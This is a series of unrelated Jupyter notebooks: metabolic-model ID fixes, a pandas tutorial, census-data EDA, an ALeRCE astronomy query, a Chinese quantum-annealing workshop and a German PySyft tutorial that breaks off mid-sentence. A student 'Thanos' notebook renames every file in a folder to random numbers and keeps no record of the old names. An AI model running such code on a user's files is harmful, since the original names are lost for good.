model.metabolites.actn_c:1}) #rename model.metabolites.rr23bdo_c.id = 'btd_RR' #rename model.reactions.B23DONOR.id = 'BTDD_RR' bacillus = cameo.load_model('iYO844') bacillus.metabolites.actn__R_c bacillus.reactions.ACLDC #save& commit cobra.io.write_sbml_model(model,'../../model/p-thermo.xml') # I've spotted some metabolites with strange ID's still that I will just fix here. model = cobra.io.read_sbml_model('../../model/p-thermo.xml') model.metabolites.HC01434_c.id = 'osuc_c' model.metabolites.HC01435_c.id = '3c1ht_c' model.metabolites.HC01651_c.id = 'fapnt_c' model.metabolites.HC01652_c.id = 'dapnt_c' model.metabolites.HC01672_c.id = 'aad_c' model.metabolites.HC01710_c.id = 'dattoo_c' #save&commit cobra.io.write_sbml_model(model,'../../model/p-thermo.xml') # Additionally, I saw that memote cannot recognize ATP properly in our model. So here I will just quickly fix that. model = cobra.io.read_sbml_model('../../model/p-thermo.xml') model_e_coli = cameo.load_model('iML1515') model.metabolites.atp_c.notes = model_e_coli.metabolites.atp_c.notes model.metabolites.atp_c.annotation = model_e_coli.metabolites.atp_c.annotation #save&commit cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')
notebooks/15. Finalizing mass balancing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <div style="width: 100%; overflow: hidden;"> # <div style="width: 150px; float: left;"> <img src="https://raw.githubusercontent.com/DataForScience/Networks/master/data/D4Sci_logo_ball.png" alt="Data For Science, Inc" align="left" border="0" width=150px> </div> # <div style="float: left; margin-left: 10px;"> <h1>Transforming Excel Analysis into pandas Data Models</h1> # <h1>Pandas DataFrames</h1> # <p><NAME><br/> # <a href="http://www.data4sci.com/">www.data4sci.com</a><br/> # @bgoncalves, @data4sci</p></div> # </div> # + import matplotlib import matplotlib.pyplot as plt import pandas as pd import numpy as np import watermark # %load_ext watermark # %matplotlib inline # - # We start by print out the versions of the libraries we're using for future reference # %watermark -n -v -m -g -iv # Set the default figure style plt.style.use('./d4sci.mplstyle') # ## DataFrames and Series # Series and DataFrames can be thought of as dictionaries associating keys to lists of values data = {"id": [23, 42, 12, 86], "Name": ["Bob", "Karen", "Kate", "Bill"]} data # A Series corresponds to just a sigle list of values series = pd.Series(data["id"]) series # While a DataFrame can have multiple df = pd.DataFrame(data) df # Another way of looking at it, is that DataFrames are essentially groups of individual Series. Each Series can have it's own datatype **dtype** df.dtypes # We can get general information about how the DataFrame is being stored by calling __info()__ df.info() # Subsetting a DataFrame by column name we retrieve the underlying Series type(df['id']) # Both columns and index values have types and possibly names df.columns df.index # And we can query the shape and number of dimensions of the DataFrame easily df.shape df.ndim # And relabel both index and column values df.index = ["row" + str(i) for i in range(4)] df.columns = ['ID', 'First Name'] df.loc['row1'] df.iloc[1] # ## Importing and exporting data # ### Read csv files # File can be zipped green = pd.read_csv('data/green_tripdata_2014-04.csv.gz', parse_dates=['lpep_pickup_datetime', 'Lpep_dropoff_datetime'], nrows=1000, index_col='VendorID', dtype={'RateCodeID':'str', 'Trip_type': 'str'} ) # We read only 1000 rows as expected green.shape # And used the right dtypes for each column green.info() # ### Read excel spreadsheets # By default, __read_excel__ reads the first spreadsheet movies = pd.read_excel('data/movies.xlsx', index_col='Title', engine='openpyxl') movies.head(10) # But it preserves no information about the sheet name. An alternative is to use dfs = pd.read_excel('data/movies.xlsx', sheet_name=None, engine='openpyxl') # To retrieve a dictionary with all the available sheets keyed by name len(dfs) dfs.keys() movies_1900 = dfs['1900s'] movies_1900.head() # Or to select a specific work sheet directly by name movies_2000 = pd.read_excel('data/movies.xlsx', sheet_name='2000s', engine='openpyxl') movies_2000.head() # If the cells contain formulas, pandas simply returns the current values (the current output of each formula) mortgage = pd.read_excel('data/excel-mortgage-calculator.xlsx', skiprows=15, engine='openpyxl') mortgage # Wherever possible, dypes are chosen according to the excel format specified mortgage.info() # ### ExcelFile book = pd.ExcelFile('data/movies.xlsx') # We can easily get a list of all worksheets book.sheet_names # We can easily parse a specific sheet and convert it to a DataFrame df3 = book.parse('2000s') df3.head() # __parse__ supports most of the parameters available for read_excel df4 = book.parse('2000s', index_col=0, usecols=['Title', 'Year', 'Director', 'Budget']) df4.head() # ### Web pages # We're going to use the Wikipedia page with the current numbers of cases for CoVID-19 url = 'https://en.wikipedia.org/wiki/COVID-19_pandemic_by_country_and_territory' # All we have to do is to provide the url dfs = pd.read_html(url) # Which retrieves all the tables in the page, in the order they appear len(dfs) # So the first one is the infobox on the top right hand corner dfs[0] # And the fifth one is the number of cases and deaths per country dfs[14].head() # Due to the formatting of the table, pandas interpreted the first two rows to be the headers. We can fix this by explicitly telling it to just use the first row for the column headers dfs = pd.read_html(url, header=0) dfs[9] # ## Subsetting # The top/bottom N number of values are easy to access movies.head(10) movies.tail(2) # And individual rows, which can be indexed by Name movies.loc["Wild Wild West\xa0"] # Or by position movies.iloc[1336] # Rows behave a named tuples, so you can access individual elements by position: movies.iloc[1336, 10] # Or by name movies.iloc[1336].Budget movies.loc['Wild Wild West\xa0', 'Director'] # Ranges can also be used with iloc movies.iloc[1:4] # And __loc__ with the important difference that loc automatically __includes__ the last value of the range, while iloc does not movies.loc["Over the Hill to the Poorhouse\xa0":"Metropolis\xa0"] # Since each column is just a numpy array, we can easily manipulate the values and create new columns movies['Budget2'] = movies.Budget+42 movies[['Budget', 'Budget2']] # We can also append new rows to the dataframe. Since we have 3 sheets that all follow the same format, we can just stack them together using __concat__: df2 = pd.concat([movies, movies_2000]) df2 # __concat__ can also be used to place two DataFrames side by side movies.shape pd.concat([movies, movies], axis=1).shape # ## Time Series # Apple stock information from https://finance.yahoo.com/quote/AAPL/history # We can automatically convert the Date column using __pd.read_csv__: data = pd.read_csv('data/AAPL.csv', parse_dates=['Date']) data.dtypes # If we now set the Date column to be the index, we effectively create our first Time Series data.set_index('Date', inplace=True) # We see that pandas automatically generated a "DatetimeIndex" object that allos us to take advantage of the fact that we are dealing with dates data.info() # We can easily access parts of the date object data data.index.month data.index.year data.index.day # And slice the DataFrame by date data.loc['2010':'2010-06-10'].round(2) # As before, we note that the last value is also included # ## DataFrame Manipulations # Map allows us to easily apply a function to the rows of a Series. movies['Director'].head() movies['Director'].map(lambda x: x.lower()) # For a dataframe we need to use transform movies[['Duration', 'Budget']].head() movies[['Duration', 'Budget']].transform(lambda x: x * 2) # Or apply movies[['Duration', 'Budget']].apply(np.sum, axis=0) movies[['Duration', 'Budget']].apply(np.sum, axis=1) # ## Merge and Join # Define 2 toy DataFrames # + A = pd.DataFrame({"lkey": ["foo", "bar", "baz", "foo"], "value": [1, 2, 3, 4]}) B = pd.DataFrame({"rkey": ["foo", "bar", "qux", "bar"], "value": [5, 6, 7, 8]}) # - # Merge allows us to join them by specifying an arbitrary column on each of them A.merge(B, left_on="lkey", right_on="rkey", how="right") # On the other hand, join performs the join using the respective Indices A.set_index('lkey', inplace=True) B.set_index('rkey', inplace=True) A.join(B, lsuffix="_l", rsuffix="_r", how="inner") # <div style="width: 100%; overflow: hidden;"> # <img src="data/D4Sci_logo_full.png" alt="Data For Science, Inc" align="center" border="0" width=300px> # </div>
2. Pandas DataFrames.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Thanos - project 1 # ### 1- function Thanos to read the files import os import random os.chdir(f'{os.getcwd()}\\assi-than') def thanos_project(earth): people=os.listdir(earth) return people # #### Try it by yourself people=thanos_project(os.getcwd()) people # ### 2- Renaming the files with random names: def renaming(): for i in range(len(people)): name=str(random.randint(758694,9458767)) return name def random_names(lst): for i in lst: os.rename(i,renaming()) random_names(people) # #### checkout the changes: BOOOOOOOM!! people=thanos_project(os.getcwd()) people
thanos project1.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Task 4: Personal EDA - Kyle import pandas as pd import numpy as np import seaborn as sns import project_functions # This is called a relative import import matplotlib.pyplot as plt import pandas_profiling as pdp from pandas_profiling import ProfileReport df = project_functions.load_and_process("../../data/raw/adult.data") df prof = ProfileReport(df) prof.to_file(output_file='milestone2_data_overview.html') # The code above creates a new html file called mileston2_data_overview.html which produce a brief explanation of the dataframe we have. It shows the type of variables and also a description of thouse values including the mean, distinct value, median, etc. This tool is very useful if we want to fundementally understand the data we have without any complex analysis. order = df['Education'].value_counts(ascending=False).index sns.countplot(y="Education",order=order ,data=df).set_title("Amount of Working Adults by Education") # This is a visualization that illustrates the distribution of the education level of the working adults from the data. As we could see, most of the working adults are only High-School graduates followed by college-related experience such as bachelor's, master's, or just still in college. There are also a group of people who only finish junior high or even lower such as grade school or even not finishing grade school. There seem to be a couple of people who did not get any proper education past preschool. order = df['Race'].value_counts(ascending=False).index sns.countplot(y="Race",order=order ,data=df).set_title("Amount of Working Adults by Race") # This is a visualization illustrating the distribution of working adults races. Most of the workers are white people which could be Europeans or North Americans. There exist a lack of diversity in the working are of America. White people dominate the market of workers. The second-largest group of people is Black people which are less than 20% of the working white adults. The next largest are Asian people. There also exist other unlisted groups of people who have the same or around the same quantity as native Americans in the data. # + h = sns.displot(df, x = "Age",binwidth=1,hue="Race",multiple = "stack",common_norm=False) plt.title("Reported Working Adult Age by Race") plt.xlabel("Age") plt.ylabel("Race") # - # This is a visualization on working adults races are spread over their ages. As expected from the previous plot, the majority of races of each age are whites. However, as the age is getting older, the diversity began to decrease especially working ages past the normal retirement age which is around 66 - 67 years old, depending on the year the person was born. There is also an outlier near the 90-year group age. There are more working adults around that age than 82 years old to 88 years old. # --- # **The code and results below this part will be use to show the distribution of salary accross the numerious variable we have** sns.countplot(y="Workclass" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Education" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Marital Status" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Occupation" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Relationship" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Race" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Sex" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race") sns.countplot(y="Native Country" ,data=df, hue = "Salary").set_title("Amount of Working Adults by Race")
analysis/kyle/milestone2.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Querying ALeRCE - Stamp Classifier # ```Author: <NAME>, Last updated 20210426``` # # Table of contents: # * [Querying the ALeRCE API Python Client](#api) # * [Replicating process with direct database query](#db) # * [Comparing API and DB outputs](#compare) # * [Understanding retrieved object data](#data) # * [Exporting to VOTable](#export) # **Goal:** # # 1) To query the ALeRCE database for objects with the following attributes: # * detected 24 - 48 hours from the current time # * classified by the stamp classifier (version 1.0.4) # # 2) To return a table consisting of ALeRCE alert objects that includes, per row: # * aggregated detection properties per object (e.g. mean RA/Dec, number of detections) # * probability of the highest ranking class assigned by the stamp classifier (v1.0.4) # # We will try this by querying the ALeRCE API first, and then directly querying the ZTF database. # + import sys import time # Packages for direct database access # # %pip install psycopg2 import psycopg2 import json # Packages for data and number handling import numpy as np import pandas as pd import math # Packages for calculating current time and extracting ZTF data to VOTable from astropy.time import Time from astropy.table import Table, unique, vstack from astropy.io.votable import from_table, writeto from datetime import datetime # Packages for display and data plotting, if desired from IPython.display import HTML from IPython.display import display import matplotlib.pyplot as plt # %matplotlib inline # - # Set up ALeRCE python client from alerce.core import Alerce client = Alerce() # ## Querying the ALeRCE API Python Client<a class="anchor" id="api"></a> # We will retrieve these objects per class, first by building a function that uses the ALeRCE client to query objects according to stamp classifier predictions. # # Note that according to the ZTF API (```ztf-api/api/sql/astro_object/astro_object.py```), the default ranking for ```query_objects``` when ranking is not specified is 1. # Define function that queries objects according to class def query_class_objects(cn, min_lastmjd, max_lastmjd): objects = client.query_objects(classifier = 'stamp_classifier', classifier_version = 'stamp_classifier_1.0.4', class_name = cn, lastmjd = [min_lastmjd, max_lastmjd], page_size = int(1e6), format='pandas') return objects # + # Querying the ALeRCE client for objects detected 24 - 48 hours from the current time, over a range of classes min_lastmjd = Time(datetime.today(), scale='utc').mjd - 2 max_lastmjd = Time(datetime.today(), scale='utc').mjd - 1 classes = ["AGN", "SN", "VS", "asteroid", "bogus"] apiobjects = Table() # Start timer start = time.time() for class_name in classes: class_objects = query_class_objects(class_name, min_lastmjd, max_lastmjd) if class_name == classes[0]: apiobjects = class_objects else: apiobjects = pd.concat([apiobjects, class_objects]) print('Class queried: %s' % (class_name)) if class_name == classes[-1]: print('Done.') # End timer end = time.time() print(f"Runtime of the program is {end - start}") # + # Prints the dataframe shape: (number of selected objects, number of selected filters) print(apiobjects.shape) # Sorting detections by lastMJD, firstMJD, and OID in descending order apiobjects = apiobjects.sort_values(by=['lastmjd', 'firstmjd', 'oid'], ascending=False) apiobjects.head() # - # ## Replicating process with direct database query<a class="anchor" id="db"></a> # + # Open and load credentials credentials_file = "../alercereaduser_v4.json" with open(credentials_file) as jsonfile: params = json.load(jsonfile)["params"] # Open a connection to the database conn = psycopg2.connect(dbname=params['dbname'], user=params['user'], host=params['host'], password=params['password']) # + query=''' SELECT object.oid, object.meanra, object.meandec, object.sigmara, object.sigmadec, object.firstmjd, object.lastmjd, object.ndet, pr.classifier_name, pr.classifier_version, pr.class_name, pr.ranking, pr.probability FROM object INNER JOIN ( SELECT probability.oid, probability.classifier_name, probability.classifier_version, probability.class_name, probability.ranking, probability.probability FROM probability WHERE probability.classifier_name = 'stamp_classifier' AND probability.classifier_version = 'stamp_classifier_1.0.4' AND probability.ranking = 1 ) AS pr ON object.oid = pr.oid WHERE object.lastMJD >= %s AND object.lastMJD <= %s ''' % (min_lastmjd, max_lastmjd) # Outputs as a pd.DataFrame dbobjects = pd.read_sql_query(query, conn) # + # Prints the dataframe shape: (number of selected objects, number of selected filters) print(dbobjects.shape) # Sorting detections by lastMJD in descending order dbobjects = dbobjects.sort_values(by=['lastmjd', 'firstmjd', 'oid'], ascending=False) dbobjects.head() # - # ## Comparing API and DB outputs<a class="anchor" id="compare"></a> # Check that the OIDs of each row in the API table are identical to that of the corresponding row in the DB table print(set(dbobjects['oid'].values==apiobjects['oid'].values)) # Check if each row in the corresponds to a unique OID print(dbobjects['oid'].is_unique) # ## Understanding retrieved object data<a class="anchor" id="data"></a> # For this, we'll only look at the dataframe retrieved from the API client (which is alright, as the ```dbobjects``` and ```apiobjects``` dataframes encompass the same OIDs.) # The following prints out the number of OIDs that correspond to each class name: # Count number of OIDs that correspond to each class name print('Total rows : %i' % (len(apiobjects.index))) obj_classes = apiobjects.groupby('class') for key in obj_classes.groups.keys(): l = obj_classes.groups[key].size print('%s : %i' % (key, l)) # + # Identify duplicate OID entries - rows with same OID but different classes and probabilities obj_oid = apiobjects.groupby(['oid']) duplicates = [] for key in obj_oid.groups.keys(): l = obj_oid.groups[key].size if l > 1: oid = key duplicates.append(oid) print('Number of duplicate OIDs: %i' % (len(duplicates))) print('Number of unique OIDs : %i' % len(obj_oid)) # Print example rows with duplicate OIDs if len(duplicates) > 0: display(apiobjects[(apiobjects['oid']==duplicates[0])]) # - # ## Exporting to VOTable <a class="anchor" id="export"></a> # # To save this data as a VOTable requires converting it from its current form (a ```pd.DataFrame```). This is possible with the ```Table``` object from ```astropy.table```, and the functions we initially imported from ```astropy.io.votable```. Essentially, we'll convert our ```pd.DataFrame``` to an ```astropy.table.Table``` to a ```astropy.io.votable.VOTableFile```, which can then be exported. # # _A buggy caveat, however_ -- ```astropy.io.votable.VOTableFile``` objects throw an error when you attempt to pass on masked/```NaN``` values. I've gotten around this, for now, by filling in the masked values the the _string_ ```"None"``` before the ```pd.DataFrame``` is converted to a ```Table```. # Defining a function that allows you to export the dataframe into a VOTable def export_object_data(objects, filename): # Filling the masked values with the string 'NaN' objects_filled = objects.fillna('None') # Converting filled dataframe to astropy Table, then astropy VOTableFile, then exporting into .xml full_dt = Table.from_pandas(objects_filled) votable = from_table(full_dt) writeto(votable, filename) export_object_data(apiobjects, "VOTables/ztf_api_stamp_objects.xml")
example_notebooks/ZTF_Stamps_API-DB_Query.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: conda_braket # language: python # name: python3 # --- # # 第四步:后处理 # # # 在这一部分中,我们对优化结果进行后处理以进行评估和可视化。 # 首先,我们准备以下参数: # # |参数 |说明 |数值 | # |--- |--- |--- | # |method | QUBO问题的退火方法|'dwave-sa':使用Ocean工具包中的模拟退火器<br>'dwave-qa':使用量子退火器| # |raw_path|原始分子文件的路径| 在这个例子中是'./molecule-data/117_ideal.mol2'| # |data_path|处理后的分子文件的路径| 在这个例子中是'./qmu_117_ideal_data_latest.mol2'| # |bucket |存储结果的 s3 存储桶 | - | # |prefix | s3 存储桶中的文件夹名称 | - | # |task_id |您的量子退火任务id| 在这个例子中是'2b5a3b05-1a0e-443a-852c-4ec422a10e59'| # 然后我们可以使用 SA 的 **ResultParser** 对象运行后处理: # + from utility.MoleculeParser import MoleculeData from utility.QMUQUBO import QMUQUBO from utility.AnnealerOptimizer import Annealer from utility.ResultProcess import ResultParser import time timestamp = time.strftime("%Y%m%d-%H") # + method = "dwave-sa" sa_param = {} sa_param["raw_path"] = raw_path sa_param["data_path"] = data_path sa_process_result = ResultParser(method, **sa_param) # print(f"{method} result is {sa_process_result.get_all_result()}") local_time, _ , _, _= sa_process_result.get_time() print(f"time for {method}: \n \ local time is {local_time}") # - sa_atom_pos_data = sa_process_result.generate_optimize_pts() # save unfold file for visualization and parameters for experiment: 1. volume value 2. relative improvement sa_process_result.save_mol_file(f"{timestamp}") sa_process_result.parameters # 在第一个代码块中,我们可以看到SA的**local time** # 大约是 174 秒。 # 使用 **generate_optimize_pts()** 方法,最终的 3D # 展开后的点会生成并保存为json文件和mol2文件。 # 最后一个代码块显示优化结果,也存储在 json 文件中。从结果看出体积增加 # 1.0212倍。 **unfolding_results** 的值表示 # 可旋转键 15 应旋转 $270^o$ ($360/8*(7-1)$) 和 # 可旋转键 14 应旋转 $315^o$ ($360/8*(8-1)$)。 # 同时,您可以运行 QA 的后处理: # + method = "dwave-qa" qa_param = {} qa_param["bucket"] = s3_bucket qa_param["prefix"] = prefix qa_param["task_id"] = qa_task_id qa_param["raw_path"] = raw_path qa_param["data_path"] = data_path qa_process_result = ResultParser(method, **qa_param) # print(f"{method} result is {qa_process_result.get_all_result()}") local_time, task_time, total_time, access_time = qa_process_result.get_time() print(f"time for {method}: \n \ local time is {local_time},\n \ task time is {task_time}, \n \ qpu total time is {total_time}, \n \ qpu access time is {access_time}") # - # 我们可以看到运行 QA 的时间指标有很多种。 # 该任务的**local time**为 7.7 秒,即调用 api 和 # 得到退火结果的时间。 **task time** 是来自存放在桶里面的json 文件的度量。我们还可以看到**qpu total time**和**qpu access time**代表 # 在 QPU 中运行的实际时间。请参考[操作与时序](https://docs.dwavesys.com/docs/latest/c_qpu_timing.html)的详情。 qa_atom_pos_data = qa_process_result.generate_optimize_pts() # save unfold file for visualization and parameters for experiment: 1. volume value 2. relative improvement qa_process_result.save_mol_file(f"{timestamp}") qa_process_result.parameters # 同理,优化后的结果被转化为3D点并保存 # 作为本地json和mol2文件。结果表明QA获得了 # 1.021倍 # 体积增加。 # # # 最后,我们可以打开文件夹以获得优化的结果: # # ![optimize-results](../../../images/optimize-results.png) # # <center>优化结果</center> # # 我们可以将 SA 和 QA 的 json 结果和 mol2 文件分别存放在这个地方。 # 如果我们执行更多实验,更多带有时间戳的结果会存储在这里。 # 我们可以上传 # 结果**117_ideal_dwave-qa_20220216-05.mol2** # 进入 # [在线查看工具](https://www.rcsb.org/3d-view) # 查看结果: # # ![视觉](../../../images/visualization.png) # # <center>可视化</center>
docs/zh/workshop/a-molecular-unfolding/post-process.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Teil 8 - Einleitung für Pläne # # # ### Kontext # # Hier wird ein entscheidendes Objekt vorgestellt, um Federated Learning in industriellen Größenordnungen umzusetzen: der Plan # Er reduziert die benötigte Bandbreite dramatisch, ermöglich asynchrone Ansätze und gewährt den ferngesteuerten Helfern mehr Autonomie. Das original Konzept für Pläne kann in dem Paper ["Towards Federated Learning at Scale: System Design"](https://arxiv.org/pdf/1902.01046.pdf) nachgelsesen werden. In diesem Fall wurde es auf die Anforderungen der PySyft Bibiliothek angepasst. # # Ein Plan ist zum Speichern einer Aneinanderreihung von Torch Operationen gedacht. Damit gleicht er einer Funktion, kann jedoch diese Aneinanderreihung zu ferngesteuerten Helfern senden und dabei eine Referenz darauf selbst behalten. Somit kann eine Sequenz von $n$ Operationen, mit den zugehörigen Pointern, mittels einer einzigen Nachricht übermittelt werden, anstatt für jede der Operationen eine eigene Nachricht senden zu müssen. Es ist sogar möglich festgelegte Tensoren (sogenannte _State Tensoren_) mitzusenden und damit erweiterte Funktionalitäten zu nutzen. Pläne können entweder als zu sendende Funktion oder als send- und ausführbare Klasse aufgefasst werden. # Infolgedessen können Nutzer die Pläne auf höchstem Level als magische Fähigkeit auffassen, welche es erlaubt Sequenzen von Torch Funktionen auf Geräten hintereinander ausführen zu lassen. # # Eine wichtige Anmerkung ist, dass die Klasse aller verwendbaren Funktionen in den Plänen momentan noch ausschließlich auf Aneinanderreihungen von Torch Operationen limitiert sind. Dies schließt speziell die logischen Strukturen wie `if`, `for` und `while` aus, auch wenn aktuell an Notlösungen gearbeitet wird. _Um es ganz genau zu nehmen, können die logischen Statements doch eingebaut werden, allerdings legt die erste Auswertung des Statements fest, wie es im Folgenden jedesmal ausgeführt wird. In den meisten Fällen ist solches Verhalten nicht wünschenswert._ # # Autoren: # - <NAME> - Twitter [@theoryffel](https://twitter.com/theoryffel) - GitHub: [@LaRiffle](https://github.com/LaRiffle) # - <NAME> - Twitter [@bobbyawagner](https://twitter.com/bobbyawagner) - GitHub: [@robert-wagner](https://github.com/robert-wagner) # - <NAME> - Twitter [@hereismari](https://twitter.com/hereismari) - GitHub: [@mari-linhares](https://github.com/mari-linhares) # # Übersetzer: # - <NAME> - Github: [@JMBehnken](https://github.com/JMBehnken) # ### Importe und Model Spezifikationen # # Zuerst werden die offiziellen Importe getätigt. import torch import torch.nn as nn import torch.nn.functional as F # Danach folgen die Importe spezifisch zu PySyft. Eine wichtige Anmerkung ist hier, dass **ein lokaler Helfer kein Klient-Helfer sein sollte**. *Nur nicht-Klienten-Helfer können Objekte speichern, was für die Fähigkeit zum Ausführen eines Planes bedeutsam ist.* # + import syft as sy # import the Pysyft library hook = sy.TorchHook(torch) # hook PyTorch ie add extra functionalities # IMPORTANT: Local worker should not be a client worker hook.local_worker.is_client_worker = False server = hook.local_worker # - # Die ferngesteuerten Helfer oder _Geräte_ werden nach dem Schema aus dem referenzierten Artikel benannt. # Anschließend werden die Helfer mit Daten ausgestattet. # + x11 = torch.tensor([-1, 2.]).tag('input_data') x12 = torch.tensor([1, -2.]).tag('input_data2') x21 = torch.tensor([-1, 2.]).tag('input_data') x22 = torch.tensor([1, -2.]).tag('input_data2') device_1 = sy.VirtualWorker(hook, id="device_1", data=(x11, x12)) device_2 = sy.VirtualWorker(hook, id="device_2", data=(x21, x22)) devices = device_1, device_2 # - # ### Basis Beispiel # # Eine Funktion wird definiert, welche anschließend in einen Plan umgewandelt werden soll. Um dies zu erreichen, reicht es aus einen passenden Dekorator über die Funktion zu schreiben! # @sy.func2plan() def plan_double_abs(x): x = x + x x = torch.abs(x) return x # Eine Überprüfung bestätigt den Erfolg. plan_double_abs # Um einen Plan zu verwenden, müssen zwei Dinge abgeschlossen sein: # - das Bauen des Plans (_das Registrieren der Sequenz an Operationen in der Funktion_) # - das Senden des Plans zum Helfer / Gerät # # #### Bauen des Plans # # Um den Plan zu bauen, muss er nur mit einigen Daten aufgerufen werden. # # Gestartet wird mit dem Aufruf einiger Daten: # Eine Anfrage wird dabei über das Netzwerk gesendet und ein Referenz Pointer auf die Daten zurückgegeben. pointer_to_data = device_1.search('input_data')[0] pointer_to_data # Beim Versuch den Plan auf den Daten des Gerätes `location:device_1` auszuführen, wird ein Fehler verursacht werden, da der Plan noch nicht gebaut wurde. plan_double_abs.is_built # Sending non-built Plan will fail try: plan_double_abs.send(device_1) except RuntimeError as error: print(error) # Um den Plan zu bauen, muss er nur mit den benötigten Argumenten (a. k. a. einigen Daten) und der `build` Methode aufgerufen werden. Nachdem ein Plan gebaut wurde, wird er alle aneinander gereihten Befehle ausführen und in seinem Attribut `actions` abspeichern! plan_double_abs.build(torch.tensor([1., -2.])) plan_double_abs.is_built # Wird der Plan nun gesendet, so funktionert es! # This cell is executed successfully pointer_plan = plan_double_abs.send(device_1) pointer_plan # Genau wie bei Tensoren, wird ein Pointer auf das gesendete Objekt zurückgegeben. In diesem Falle ist es ein `PointerPlan`. # Es ist wichtig sich in Erinnerung zu rufen, dass beim Bauen des Plans alle Ids der Speicherorte für die Ergebnisse festgelegt werden, bevor die eigentlichen Berechnungen starten. Dies ermöglicht ein asynchrones senden der Befehle, da ein Referenz Pointer zurückgegeben wird, bevor die Berechnungen auf dem Helfer abgeschlossen sind. Somit lässt sich mit lokalen Befehlen fortfahren, ohne auf den Helfer warten zu müssen. Eine wichtige Anwendung dafür ist z. B. das Starten einer Berechnung eines Daten-Batches auf Gerät_1 und ohne auf das Ergebnis abwarten zu müssen, kann auf Gerät_2 ein weiterer Daten-Batch bearbeitet werden. # #### Starten eines Planes aus der Ferne # # Der Plan kann nun aus der Ferne gestartet werden, indem der Pointer zum Plan mit einem Pointer zu den Daten aufgerufen wird. Dies veranlasst die Ausführung des Plans und die Ergebnisse werden an den vorher festgelegten Orten abgelegt. Ein Pluspunkt ist, dass alles nur einer einzigen Kommunikationsrunde bedurfte. # # Das Ergebnis ist ein einfacher Pointer, wie er schon von den normalen Torch Funktionen bekannt ist! pointer_to_result = pointer_plan(pointer_to_data) print(pointer_to_result) # Dieses Ergebnis kann einfach zurückgeholt werden. pointer_to_result.get() # ### Einem konkreten Beispiel entgegen # # Eigentlich soll solch ein Plan jedoch für Deep und Federated Learning genutzt werden, nicht wahr? Lassen Sie uns ein komplizierteres Beispiel mit einem Neuronalen Netzwerk betrachten. # Anzumerken ist, dass nun eine Klasse in einen Plan übertragen wird. Dies kann erreicht werden, indem die neue Klasse von der `sy.Plan` Klasse erbt (anstelle des üblichen `nn.Module`). class Net(sy.Plan): def __init__(self): super(Net, self).__init__() self.fc1 = nn.Linear(2, 3) self.fc2 = nn.Linear(3, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = self.fc2(x) return F.log_softmax(x, dim=0) net = Net() net # Der Plan wird mit einigen Pseudo-Daten gebaut. net.build(torch.tensor([1., 2.])) # Nun wird der Plan an den ferngesteuerten Helfer gesendet. pointer_to_net = net.send(device_1) pointer_to_net # Anschließend werden noch einige Daten benötigt. pointer_to_data = device_1.search('input_data')[0] # Die Syntax ist nun identisch zum normalen Ausführen von Befehlen auf der lokalen Maschine. Verglichen mit der klassischen Fernsteuerung wird jedoch nur eine einzige Kommunikationsrunde für die Ausführung benötigt. pointer_to_result = pointer_to_net(pointer_to_data) pointer_to_result # Das Ergebnis lässt sich wie gewöhnlich erhalten! pointer_to_result.get() # Et voilà! Die Kommunikation zwischen lokaler Maschine (oder dem Server) und dem ferngesteuerten Gerät konnte dramatisch reduziert werden. # ### Wechseln zwischen Helfern # # Eine weitere wichtige und wünschenswerte Fähigkeit ist das Wiederverwenden des Planes auf mehreren Helfern mit unterschiedlichen Daten-Batches. # Ein Neubau des Planes beim Wechsel des Helfers soll hierbei vermieden werden. Im Folgenden wird das obrige Beispiel daraufhin angepasst. class Net(sy.Plan): def __init__(self): super(Net, self).__init__() self.fc1 = nn.Linear(2, 3) self.fc2 = nn.Linear(3, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = self.fc2(x) return F.log_softmax(x, dim=0) # + net = Net() # Build plan net.build(torch.tensor([1., 2.])) # - # Dies sind die wichtigsten Schritte die auszuführen waren. pointer_to_net_1 = net.send(device_1) pointer_to_data = device_1.search('input_data')[0] pointer_to_result = pointer_to_net_1(pointer_to_data) pointer_to_result.get() # Tatsächlich lassen sich andere PointerPlans einfach vom selben Plan aus nutzen und so bleibt die Syntax fürs Verwenden auf anderen Geräten identisch. pointer_to_net_2 = net.send(device_2) pointer_to_data = device_2.search('input_data')[0] pointer_to_result = pointer_to_net_2(pointer_to_data) pointer_to_result.get() # > Anmerkung: Aktuell lässt sich mit der Plan Klasse nur eine einzige Methode namens "forward" verwenden. # ### Automatisch Pläne bauen, welche auch Funktionen sind # # Für Funktionen (`@` `sy.func2plan`) kann der Plan automatisch gebaut werden ohne explizit die Methode `build` aufrufen zu müssen. In solchen Fällen ist der Plan direkt beim Erstellen gebaut. # # Um diese Funktionalität direkt nutzen zu können, muss der Dekorator nur mit dem zusätzlichen Argument `args_shape` aufgerufen werden. Dieses muss eine Liste aller Shapes der Funktions-Argumente enthalten. # + @sy.func2plan(args_shape=[(-1, 1)]) def plan_double_abs(x): x = x + x x = torch.abs(x) return x plan_double_abs.is_built # - # Der `args_shape` Parameter wird intern genutzt um Pseudo-Tensoren zu erschaffen, welche wiederum zum Bau des Plans verwendet 